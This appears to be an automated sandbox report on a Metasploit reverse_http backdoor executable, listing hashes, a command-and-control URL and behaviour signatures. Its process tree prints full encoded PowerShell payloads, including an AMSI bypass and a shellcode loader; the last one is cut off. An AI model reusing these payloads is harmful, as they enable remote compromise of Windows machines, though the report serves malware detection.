metasploit | 05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369

Analysis

max time kernel
132s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
10-05-2022 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe
Size

131KB
MD5

c4d045529b1a5e090006457607e93f08
SHA1

b81acfced02a80738f8cf6cbd123edd2fc6a5b00
SHA256

05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369
SHA512

4c8725fe40d459b07a9c7c88f6b0f58347f947fee52eb895eda306041b4411af0a19250087e92cd83352fbddbbd484d251dd8233b6b9872e699a51555685ae03

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

http://192.168.1.105:4443/iP5QhJBVvpeYe5l6xy3mEgdW6Zsv9Ekj0-naC4mpoGE1yUoeqHZASgl7zmunvPTgW8MBQJ57mAFAZCNBrgbkoHiVwzn6kkmR4bMAjaW-h1I6z5ScKVmz-s

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1580	powershell.exe
1580	powershell.exe
3676	powershell.exe
3676	powershell.exe
2952	powershell.exe
2952	powershell.exe
4920	powershell.exe
4920	powershell.exe
4580	powershell.exe
4580	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1580	powershell.exe
Token: SeDebugPrivilege	3676	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	4920	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.execmd.exepowershell.exepowershell.execsc.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2844 wrote to memory of 2704	2844	05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe	cmd.exe
PID 2844 wrote to memory of 2704	2844	05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe	cmd.exe
PID 2704 wrote to memory of 1580	2704	cmd.exe	powershell.exe
PID 2704 wrote to memory of 1580	2704	cmd.exe	powershell.exe
PID 1580 wrote to memory of 3676	1580	powershell.exe	powershell.exe
PID 1580 wrote to memory of 3676	1580	powershell.exe	powershell.exe
PID 3676 wrote to memory of 5004	3676	powershell.exe	csc.exe
PID 3676 wrote to memory of 5004	3676	powershell.exe	csc.exe
PID 5004 wrote to memory of 3244	5004	csc.exe	cvtres.exe
PID 5004 wrote to memory of 3244	5004	csc.exe	cvtres.exe
PID 2704 wrote to memory of 2952	2704	cmd.exe	powershell.exe
PID 2704 wrote to memory of 2952	2704	cmd.exe	powershell.exe
PID 2952 wrote to memory of 4920	2952	powershell.exe	powershell.exe
PID 2952 wrote to memory of 4920	2952	powershell.exe	powershell.exe
PID 4920 wrote to memory of 4580	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 4580	4920	powershell.exe	powershell.exe
PID 4920 wrote to memory of 4580	4920	powershell.exe	powershell.exe
PID 4580 wrote to memory of 624	4580	powershell.exe	csc.exe
PID 4580 wrote to memory of 624	4580	powershell.exe	csc.exe
PID 4580 wrote to memory of 624	4580	powershell.exe	csc.exe
PID 624 wrote to memory of 4524	624	csc.exe	cvtres.exe
PID 624 wrote to memory of 4524	624	csc.exe	cvtres.exe
PID 624 wrote to memory of 4524	624	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe
"C:\Users\Admin\AppData\Local\Temp\05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F0A.tmp\6F0B.tmp\6F1C.bat C:\Users\Admin\AppData\Local\Temp\05a01c83fecfb19fbbb054d0a68031cb67fa7b0ee9892b401e6a865de52b3369.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv AUf -;sv qt ec;sv Zr ((gv AUf).value.toString()+(gv qt).value.toString());powershell (gv Zr).value.toString() ('JABIAFYAVwBBAFIAbwBFAHUAaABZACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsACIAKwAiADMAIgArACIAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABIAFYAVwBBAFIAbwBFAHUAaABZADsAJABUAHYAZwBEAHQAWABrAFIATQBNACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAFsAVwBpAG4AMwAyAF0AOgA6AEwAbwBhAGQATABpAGIAcgBhAHIAeQAoACIAQQBtAHMAIgArACIAaQAiACsAIgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQAsACAAIgBBAG0AcwAiACsAIgBpACIAKwAiAFMAIgArACIAYwAiACsAIgBhAG4AQgB1AGYAZgBlAHIAIgApADsAJABwAGUAYgBwAHUAIAA9ACAAMAA7AFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAVAB2AGcARAB0AFgAawBSAE0ATQAsACAAWwB1AGkAbgB0ADMAMgBdAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAGUAYgBwAHUAKQA7ACQASwBtAG8AaABzAGEAagBFAHQAcgAgAD0AIAAoACIAfQBCADgALAAgAH0ANQA3ACwAIAB9ADAAMAAsACAAfQAwADcALAAgAH0AOAAwACwAIAB9AEMAMwAiACkALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAgACIAMAB4ACIAKQA7ACQASwBtAG8AaABzAGEAagBFAHQAcgAgAD0AIABbAEIAeQB0AGUAWwBdAF0AKAAkAEsAbQBvAGgAcwBhAGoARQB0AHIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBDAG8AcAB5ACgAJABLAG0AbwBoAHMAYQBqAEUAdAByACwAIAAwACwAIAAkAFQAdgBnAEQAdABYAGsAUgBNAE0ALAAgADYAKQA=')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABIAFYAVwBBAFIAbwBFAHUAaABZACAAPQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMATgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAIgArACIAMwAiACsAIgAyACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABMAG8AYQBkAEwAaQBiAHIAYQByAHkAKABzAHQAcgBpAG4AZwAgAG4AYQBtAGUAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsACIAKwAiADMAIgArACIAMgAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIABVAEkAbgB0AFAAdAByACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwATgBlAHcAUAByAG8AdABlAGMAdAAsACAAbwB1AHQAIAB1AGkAbgB0ACAAbABwAGYAbABPAGwAZABQAHIAbwB0AGUAYwB0ACkAOwB9AAoAIgBAAAoAQQBkAGQALQBUAHkAcABlACAAJABIAFYAVwBBAFIAbwBFAHUAaABZADsAJABUAHYAZwBEAHQAWABrAFIATQBNACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AEcAZQB0AFAAcgBvAGMAQQBkAGQAcgBlAHMAcwAoAFsAVwBpAG4AMwAyAF0AOgA6AEwAbwBhAGQATABpAGIAcgBhAHIAeQAoACIAQQBtAHMAIgArACIAaQAiACsAIgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQAsACAAIgBBAG0AcwAiACsAIgBpACIAKwAiAFMAIgArACIAYwAiACsAIgBhAG4AQgB1AGYAZgBlAHIAIgApADsAJABwAGUAYgBwAHUAIAA9ACAAMAA7AFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAVAB2AGcARAB0AFgAawBSAE0ATQAsACAAWwB1AGkAbgB0ADMAMgBdAFsAdQBpAG4AdAAzADIAXQA1ACwAIAAwAHgANAAwACwAIABbAHIAZQBmAF0AJABwAGUAYgBwAHUAKQA7ACQASwBtAG8AaABzAGEAagBFAHQAcgAgAD0AIAAoACIAfQBCADgALAAgAH0ANQA3ACwAIAB9ADAAMAAsACAAfQAwADcALAAgAH0AOAAwACwAIAB9AEMAMwAiACkALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAgACIAMAB4ACIAKQA7ACQASwBtAG8AaABzAGEAagBFAHQAcgAgAD0AIABbAEIAeQB0AGUAWwBdAF0AKAAkAEsAbQBvAGgAcwBhAGoARQB0AHIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBDAG8AcAB5ACgAJABLAG0AbwBoAHMAYQBqAEUAdAByACwAIAAwACwAIAAkAFQAdgBnAEQAdABYAGsAUgBNAE0ALAAgADYAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3676

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n3say3sa\n3say3sa.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E5C.tmp" "c:\Users\Admin\AppData\Local\Temp\n3say3sa\CSC6556FB2F163846F5A82484116148B01A.TMP"
6⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /w 1 /C "sv AUf -;sv qt ec;sv Zr ((gv AUf).value.toString()+(gv qt).value.toString());powershell (gv Zr).value.toString() ('JABUAGkAPQAnACQAQgBvAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABiAFkARgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQAiACsAIgBzACIAKwAiAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQATgBHAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADgAYgAsAH0ANwAyACwAfQAyADgALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQA1ADAALAB9ADAAMQAsAH0AZAAzACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADYAZQAsAH0ANgA1ACwAfQA3ADQALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADkALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9AGYAZgAsAH0AZAA1ACwAfQAzADEALAB9AGQAYgAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9AGUAOAAsAH0AMwBlACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA0AGQALAB9ADYAZgAsAH0ANwBhACwAfQA2ADkALAB9ADYAYwAsAH0ANgBjACwAfQA2ADEALAB9ADIAZgAsAH0AMwA1ACwAfQAyAGUALAB9ADMAMAAsAH0AMgAwACwAfQAyADgALAB9ADUANwAsAH0ANgA5ACwAfQA2AGUALAB9ADYANAAsAH0ANgBmACwAfQA3ADcALAB9ADcAMwAsAH0AMgAwACwAfQA0AGUALAB9ADUANAAsAH0AMgAwACwAfQAzADYALAB9ADIAZQAsAH0AMwAxACwAfQAzAGIALAB9ADIAMAAsAH0ANQA0ACwAfQA3ADIALAB9ADYAOQAsAH0ANgA0ACwAfQA2ADUALAB9ADYAZQAsAH0ANwA0ACwAfQAyAGYALAB9ADMANwAsAH0AMgBlACwAfQAzADAALAB9ADMAYgAsAH0AMgAwACwAfQA3ADIALAB9ADcANgAsAH0AMwBhACwAfQAzADEALAB9ADMAMQAsAH0AMgBlACwAfQAzADAALAB9ADIAOQAsAH0AMgAwACwAfQA2AGMALAB9ADYAOQAsAH0ANgBiACwAfQA2ADUALAB9ADIAMAAsAH0ANAA3ACwAfQA2ADUALAB9ADYAMwAsAH0ANgBiACwAfQA2AGYALAB9ADAAMAAsAH0ANgA4ACwAfQAzAGEALAB9ADUANgAsAH0ANwA5ACwAfQBhADcALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANgBhACwAfQAwADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADUAYgAsAH0AMQAxACwAfQAwADAALAB9ADAAMAAsAH0AZQA4ACwAfQAwADcALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAZgAsAH0ANgA5ACwAfQA1ADAALAB9ADMANQAsAH0ANQAxACwAfQA2ADgALAB9ADQAYQAsAH0ANAAyACwAfQA1ADYALAB9ADcANgAsAH0ANwAwACwAfQA2ADUALAB9ADUAOQAsAH0ANgA1AC'+'wAfQAzADUALAB9ADYAYwAsAH0AMwA2ACwAfQA3ADgALAB9ADcAOQAsAH0AMwAzACwAfQA2AGQALAB9ADQANQAsAH0ANgA3ACwAfQA2ADQALAB9ADUANwAsAH0AMwA2ACwAfQA1AGEALAB9ADcAMwAsAH0ANwA2ACwAfQAzADkALAB9ADQANQAsAH0ANgBiACwAfQA2AGEALAB9ADMAMAAsAH0AMgBkACwAfQA2AGUALAB9ADYAMQAsAH0ANAAzACwAfQAzADQALAB9ADYAZAAsAH0ANwAwACwAfQA2AGYALAB9ADQANwAsAH0ANAA1ACwAfQAzADEALAB9ADcAOQAsAH0ANQA1ACwAfQA2AGYALAB9ADYANQAsAH0ANwAxACwAfQA0ADgALAB9ADUAYQAsAH0ANAAxACwAfQA1ADMALAB9ADYANwAsAH0ANgBjACwAfQAzADcALAB9ADcAYQAsAH0ANgBkACwAfQA3ADUALAB9ADYAZQAsAH0ANwA2ACwAfQA1ADAALAB9ADUANAAsAH0ANgA3ACwAfQA1ADcALAB9ADMAOAAsAH0ANABkACwAfQA0ADIALAB9ADUAMQAsAH0ANABhACwAfQAzADUALAB9ADMANwAsAH0ANgBkACwAfQA0ADEALAB9ADQANgAsAH0ANAAxACwAfQA1AGEALAB9ADQAMwAsAH0ANABlACwAfQA0ADIALAB9ADcAMgAsAH0ANgA3ACwAfQA2ADIALAB9ADYAYgAsAH0ANgBmACwAfQA0ADgALAB9ADYAOQAsAH0ANQA2ACwAfQA3ADcALAB9ADcAYQAsAH0ANgBlACwAfQAzADYALAB9ADYAYgAsAH0ANgBiACwAfQA2AGQALAB9ADUAMgAsAH0AMwA0ACwAfQA2ADIALAB9ADQAZAAsAH0ANAAxACwAfQA2AGEALAB9ADYAMQAsAH0ANQA3ACwAfQAyAGQALAB9ADYAOAAsAH0AMwAxACwAfQA0ADkALAB9ADMANgAsAH0ANwBhACwAfQAzADUALAB9ADUAMwAsAH0ANgAzACwAfQA0AGIALAB9ADUANgAsAH0ANgBkACwAfQA3AGEALAB9ADIAZAAsAH0ANwAzACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQA1ADcALAB9ADgAOQAsAH0AOQBmACwAfQBjADYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADkALAB9AGMANgAsAH0ANQAzACwAfQA2ADgALAB9ADAAMAAsAH0AMwAyACwAfQBlADgALAB9ADgANAAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA3ACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQBlAGIALAB9ADUANQAsAH0AMgBlACwAfQAzAGIALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADYALAB9ADYAYQAsAH0AMABhACwAfQA1AGYALAB9ADYAOAAsAH0AOAAwACwAfQAzADMALAB9ADAAMAAsAH0AMAAwACwAfQA4ADkALAB9AGUAMAAsAH0ANgBhACwAfQAwADQALAB9ADUAMAAsAH0ANgBhACwAfQAxAGYALAB9ADUANgAsAH0ANgA4ACwAfQA3ADUALAB9ADQANgAsAH0AOQBlACwAfQA4ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADQALAB9ADYAOAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBjAGQALAB9AGUAOAAsAH0ANABhACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0AMAAwACwAfQAwADAALAB9ADQAMAAsAH0AMAAwACwAfQA1ADMALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADUAMwAsAH0AOAA5ACwAfQBlADcALAB9ADUANwAsAH0ANgA4ACwAfQAwADAALAB9ADIAMAAsAH0AMAAwACwAfQAwADAALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADEAMgAsAH0AOQA2ACwAfQA4ADkALAB9AGUAMgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9AGMAZgAsAH0AOABiACwAfQAwADcALAB9ADAAMQAsAH0AYwAzACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQBlADUALAB9ADUAOAAsAH0AYwAzACwAfQA1AGYALAB9AGUAOAAsAH0ANgBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAzADEALAB9ADMAOQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMQAsAH0AMwA2ACwAfQAzADgALAB9ADIAZQAsAH0AMwAxACwAfQAyAGUALAB9ADMAMQAsAH0AMwAwACwAfQAzADUALAB9ADAAMAAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHQAWgA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAQgBvACAALQBOAGEAbQBlACAAIgBYAEQAIgAgAC0AbgBhAG0AZQBzACAAaABVAEIAOwAkAHQAWgA9ACQAdABaAC4AcgBlAHAAbABhAGMAZQAoACIAaABVAEIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQATgBHACAAPQAgACQATgBHAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBMAGoAaABQAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIATABqAGgAUAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBLAD0AMAB4ADEAMAAwADcAOwBpAGYAIAAoACQATgBHAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADcAKQB7ACQASwBLAD0AJABOAEcALgBMAH0AOwAkAE0ARgA9ACQAdA